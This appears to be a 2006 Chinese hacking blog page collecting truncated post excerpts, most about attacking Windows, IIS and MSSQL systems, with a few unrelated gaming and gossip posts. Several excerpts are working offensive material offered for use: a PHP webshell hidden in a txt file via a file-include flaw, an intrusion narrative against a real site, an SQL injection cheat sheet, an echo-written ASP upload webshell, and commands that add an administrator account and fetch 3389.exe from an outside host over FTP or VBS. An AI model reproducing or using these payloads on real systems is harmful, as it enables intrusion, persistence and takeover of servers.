2006-09-12 20:21 1.定时差异备份(时间设的小点)
2.数据库同步复制
<贴>
你可以用事物复制方式实现
=================================================
/*--备份数据库
--邹建 2003.10--*/
/*--调用示例
--备份当前数据库
exec p_backupdb @bkpath='c:\',@bkfname='db_\DATE\_db.bak'
--差异备份当前数据库
exec p_backupdb @bkpath='c:\',@bkfname='db_\DATE\_df.bak',@bktype='DF'
--备份当前数据库日志
exec p_backupdb @bkpath='c:\',@bkfname='db_\DATE\_log.bak',@bktype='LOG'
--*/
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_backupdb]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[p_backupdb]
GO
create proc p_backupdb
@dbname sysname='',--要备份的数据库名称,不指定则备份当前数据库
@bkpath nvarchar(260)='',--备份文件的存放目录,不指定则使用SQL默认的备份目录
@bkfname nvarchar(260)='',--备 |
2006-08-29 22:24 from:http://www.wuxiasp.com 单位机房一台微机中含有重要文件的文件夹不见了,经过一番折腾,发现有人用文件的类标识符把它伪装成了打印机文件。问题找到了,但是要恢复原文件夹中的文件,也着实费了一番周折。由此受到启发,我们是否可以用类标识符来保护文件夹呢?本文就介绍一下如何用它来伪装文件夹以及如何恢复被伪装的文件夹内容。 文件的类标识符 计算机中的文件根据其内容不同分为许多类型,Windows通过注册表登记了这些文件的类型及其它信息。我们打开注册表编辑器,在HKEY_CLASSES_ROOT根键下面有一个子键CLSID(“类标识符”在Windows中的英文缩写),双击该子键会出现图1的窗口。
图1
在左窗格中显示的是各类文件的类标识符,有很多项,主要用来标识文件、程序、控件类型等对象;右窗格是左窗格对应内容的展开,可以用来检查各个类标识符所表示的文件类型。例如: {00020c01-0000-0000-c000-000000000046}是WAV文件类型; {2227a280-3aea-1 |
2006-08-11 2:39 swan's blog 差异备份最早提出来可能是??????或者什么人,最近安焦出的一本书上有过一些说法,应该存在问题,这里就不讨论了。关于备份本身的改进也没有什么好说的,只是单独提一下差异备份。
从感性上认识,差异备份就是把前后不同的地方提出来,这样对于成功率而言,确实有很大的提高,一个典型的过程是:
create table cmd(str image);
backup database xxxx to disk='somewhere';
insert into cmd(str) values ('something');
backup database xxxx to disk='destination' with differential,format
这里的差异,是一种增量差异,感性上的结果是增加的部分包括增加的记录项。
那么,我们考虑了,增加的记录项带来的差异较大呢,还是修改记录项带来差异大呢?很有可能是后者,那么,这个差异备份可以被改进为:
create table cmd(str image);
insert into cmd(str) values ('something');
backup database xxxx to disk='somewhere';
update xxxx set str='newthing';
backup database xxxx to disk='destination' with differential,format
马上测试一下,结果……大家自己看~
|
2006-08-11 2:35 from:http://www.521game.cn/blog 首先建立一PHP文件test.php 文件内容为:
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问http://localhost/test/test.php?test=../t.txt如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型PHP后门客户端 木马地址添入http://localhost/test/test.php?test=../t.txt密码里添入cmd就可以了,执行返回的结果都可以看到。
方法2现在的webshell是越来越流行了,连php的后门也追上来了,主要的有angel的phpspy和lanker的一句话后门!所以现在最主要的是怎么隐蔽我们的后门,想必看完我的文章大家都有自己各自的想法了。 其实lanker的一句话后门确实很强大,但是要用户使用客户端的话会带来一些不必要的麻烦,虽然可以使程序没有记录,(POST没记录的哦)但是对于一般的站点这其实并不是很重要。 有没与想过把phpspy插到一个文件里去呢?没有想过吗? 呵呵,跟我来,我们用记事本打开phspy就好了,搜索登 |
2006-08-07 12:19 今天去milw0rm论坛注册个用户, 注册好后信箱很快收到了一封信,我先是习惯性的找链接,结果没有. 仔细看正文: Welcome to milw0rm Forums
In compliance with the COPPA act your account is currently inactive.
Please print this message out and have your parent or guardian sign and date it. Then fax it to:
OR mail it to:
------------------------------ CUT HERE ------------------------------
Permission to Participate at milw0rm
Username: Trojan_Lm
Password: ******
Email: ****@**.com
ICQ Number:
AIM Address:
MSN Messenger:
Yahoo Messenger:
Web Site:
From:
Occupation:
Interests:
I HAVE REVIEWED THE INFORMATION PROVIDED BY MY CHILD AND HEREBY GRANT PERMISSION TO milw0rm TO STORE THIS INFORMATION.
I UNDERSTAND THIS INFORMATION CAN BE CHANGED AT ANY TIME BY ENTERING A PASSWORD.
I UNDERSTAND THAT I MAY REQUEST FOR THIS INFORMATION TO BE R |
2006-07-27 1:11 2006-07-26 2:28 以前不知道为什么那么多人爱看, 也很少去,除非有人发那里的url.. 最近几天经常去, 学到了一些新东西. 比如, kb是恐怖,我以前就一直不知道kb是什么,现在是结合上下文再加上伟大的想象力,基本可以猜个八九不离十了.当然,最近爱去那里也有别的原因:最近***来了,脾气比较暴躁, 所以适合上八卦网站去:) 对了, 顺便发个那里的很经典的图<女人的一生>,经典的我看了都想哭..... |
2006-07-26 2:08 翻译 by mix ---------------------------------|
|----------------和以前一样,我要申明一下,我不是专业的翻译员-----------------|
|---------所以我也只能够根据我自己的理解,尽量符合原文意思的进行翻译----------|
|------------有能力的朋友最好看原文,我的翻译只能作为一个参考而已-------------|
|------------翻译完后感觉基本上说清楚了这些事情,细节问题就难说了-------------|
- P H R A C K M A G A Z I N E -
Volume 0xa Issue 0x38
0x0a[0x10]
|------------------ 当我们完全控制CISCO路由器时能够做的事情 ------------------|
|-----------------------------------------------------------------------------|
|-------------------------- gauis <gaius@hert.org> ---------------------------|
----| 1. 声明
隧道技术(Tunnelx)是HERT(黑客紧急事件应急小组)努力研究开发的一套技术。他不是为了任何一个攻击者或信息防卫战而做的产品工具。严格的说,这只是作理论上的研究和论证罢了。
如果你是一个未被授权者,你没有权利保留该文的任 |
2006-07-26 1:57 from:http://my.donews. 这一篇文章纯属个人入侵的总结,并没有什么高深之处,第一次写文章,难免有一些错误或者你有什么新思路,请不吝指教! 在百度上搜索ckl inurl:asp,搜索出来的,只要是MSSQL数据库的就一定是db_owner权限以上,起码我还没看到过
public的,db_owner可是对当前连接的数据库拥有一切操作权利,可以执行select,update,delete.create.drop等命令.
在搜索出来的资料,找到一个china级的网站,是db_owner权限,浏览一下网站,发现上面上了一个动网7.1论坛,通过
whois.webhosting.info查询,发现还挂有一个网站,应当是个人主机,通过telnet target 80发现iis5.0的,windows2000的吧!
1,得到webshell
有两个思路.第一个是从网站着手
首先从暴表开始,找了一下发现user这个表示存放的动网的用户表,再暴这个表的字段,顺利找出管理员的用户名和密码,密码是md5加密,到www.xmd5.org是解一下,发现管理员还是有一些安全意识的,不是弱口令.那我们是
db_owner权限,可以update,还害怕什么!直接在注入点 |
2006-07-26 1:51 Sql注射总结(强烈推荐)
Sql注射总结(早源于'or'1'='1)
最重要的表名:
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
最重要的一些用户名(默认sql数据库中存在着的)
public
dbo
guest(一般禁止,或者没权限)
db_sercurityadmin
ab_dlladmin
一些默认扩展
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia 驱动器相关
xp_dirtree 目录
xp_enumdsn ODBC连接
xp_loginconfig 服务器安全模式信息
xp_makecab 创建压缩卷
xp_ntsec_enumdomains domain信息
xp_terminate_process 终端进程,给出一个PID
例如:
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select |
2006-07-26 1:45 BY 寂寞的刺猬 [LoveShell] 前几天贴出了动网跨站的图片,原地址: http://www.loveshell.net/blog/blogview.asp?logID=108 今天简要说一下跨站形成的原因。 一、BOKE跨站 注:详细的原理及利用 请阅读 《黑客手册》 2006 年第八期。 在"CheckInput.asp"中,自定义函数"FormatCode()",过滤不严。 Public Function FormatCode(StrData) '提交格式化数据 ............ Re.Pattern = "<(\w*) class\s*=\s*([^>|\s]*)([^>]*)>" '以下是正则表达式,用于过滤提交数据 Str = re.Replace(Str,"<$1$3>") Re.Pattern = "<(\w*) style\s*=\s*([^>|\s]*)([^>]*)>" Str = re.Replace(Str,"<$1$3>") .............. FormatCode = Str End Function 其中过滤的是 < style=****>,而非 <style=****>,导致跨站代码可以写入BOKE文章及评论中。 在"book.asp"中,而显示文章及评论内容时,如果出现"Dv_FilterJS()"中定义的以下字符才会用"Server.HtmlEncode |
2006-07-25 21:26 1、很久以前,某日通灵野队,牧师A提前说好只能打到X点,然后要去看电视剧。队里人也都同意,因为恰好在X点牧师B就出副本可以组来继续。然后到X点,正如计划一样,牧师A还是道了声歉离开,牧师B也及时组进。这时牧师B发现队里有个她不喜欢的法师C,要求队长T了才来,并且说可以组法师D来打工。于是法师C爆料,曾和牧师B视频后说了句她不漂亮,接着二人在小队频道互骂……被队长全部劝退。还好后来朋友有时间了来帮忙才得以顺利通完。
2、还是很久以前,晚上组队去黑下,打到一半的时候某战士突然说要回去,理由:游戏之前喝酒了,喝的不少,现在有些晕,怕一会学校关门翻墙的时候摔到……
3、某次ZG,打完4号,团里唯一的术士说,他爸爸妈妈在闹离婚,下了……
4、至于其他,肚子饿了,亲戚朋友/老婆老公/同学同事/领导等等叫了,要断网要停电了,也见过不少。
5、老婆要生了,我去看下我儿子什么样子的~
6、狗剩喊我去割小麦。。。
7、我们工会的牧师在mc的时候说丈母娘车祸了 然后下了
8、"受不了了..LP在旁边XX我.你们先忙.我等下来"
9、还有次打MC还是BWL哦, 中途3T说“== 我去把管电的阿姨搞定” 半个小时后 |
2006-07-23 1:13 间谍,一直是远离人们生活的,但事实上,各类的间谍无时无处不在我们的身边.
近来,在业界流传一个惊人的消息,中国国内知名的信息安全厂商北京绿盟科技公司爆出台湾间谍案,国家安全与保密部门已经严重关注此事.
绿盟公司原来就是一些黑客组成,依靠其对技术的理解和掌握,在安全技术和产品上形成了自己比较强的实力,已经成为国内重要的安全技术与服务公司,在安全服务领域比较超前.
爆出间谍事件的详细原因还未对外正式公布,有的说是其竞争对手启明星辰在恶意诋毁打击,有的说是原来离职的员工故意对公司的报复.
一直以来,台湾在中国大陆派遣了一批又一批的间谍及情报搜集人员,重点对中国大陆的军事国防政治经济情况进行整理搜集,随着网络信息的不断发展,网络安全已经是决定一个国家安全的重要的组成部分,因此,重点对网络安全进行渗透的可能性在不断的加强.
以前,台湾经常培训大量的网络技术高手和黑客对大陆的各类网站及重点中心进行攻击,取得了很大的效果,随着大陆对安全问题的日益重视,双方在虚拟的社会中进行着看不到的战争,各有得失,可以看出,虚拟的互连网社会也已经变成了另一场见不到硝 |
2006-07-20 7:45 by:zzzzzzazzzzz 目录 1,前言 2,文件传输 3,系统配置 4,网络配置 5,软件安装 6,Windows脚本 7,附言
前言
Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。
本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。
文件传输
对于溢出漏洞获得的cmd shell,最大的问题就是如何上传文件。由于蠕虫病毒流行,连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护,通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法,介于其已被大家熟知,本文就不介绍了。还有三种大家熟悉的办法,作为总结我再提一下: 1,用Echo命令写ASP木马。
前提当然是目标主机上已经安装了IIS。
一般的ASP木马"体积"较大,不适合直接用echo命令写入文件,这里我提供一个小巧的。
直接给出echo版: @echo ^<%with server.createobject("adodb.stream"):.type=1:.open:.write request.binaryread(request.totalbytes):.savetofile server.mappath(request.querystring("s")),2:end with%^> |
2006-07-20 7:42 虽然说我们应该追求技术,但是技巧也不能放过的^_^可以省出好多时间睡觉
1.常见'or''='式SQL injection构造语句
' or 1=1--
" or 1=1--
or 1=1--
or 'a'='a
1' or "a"="a
') or ('a'='a
") or ("a"="a
'or''='
'1 or 1=1
1' and '1'='1
2.制做VBS添加用户
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user rover rover1234 /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators rover /add",0)
3.文件传输
FTP:
echo open FTPSERVER 21 >ftp.txt
echo rover>>ftp.txt
echo rover1234 >>ftp.txt
echo binary >>ftp.txt [可选]
echo get 3389.exe >>ftp.txt
echo bye >>ftp.txt
ftp -s:ftp.txt
VBS:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs
echo xPost.Open "GET","http://www.test.net/3389.exe",0 >>webdown.vbs
echo xPost.Send() >>webdown.vbs |
| | |
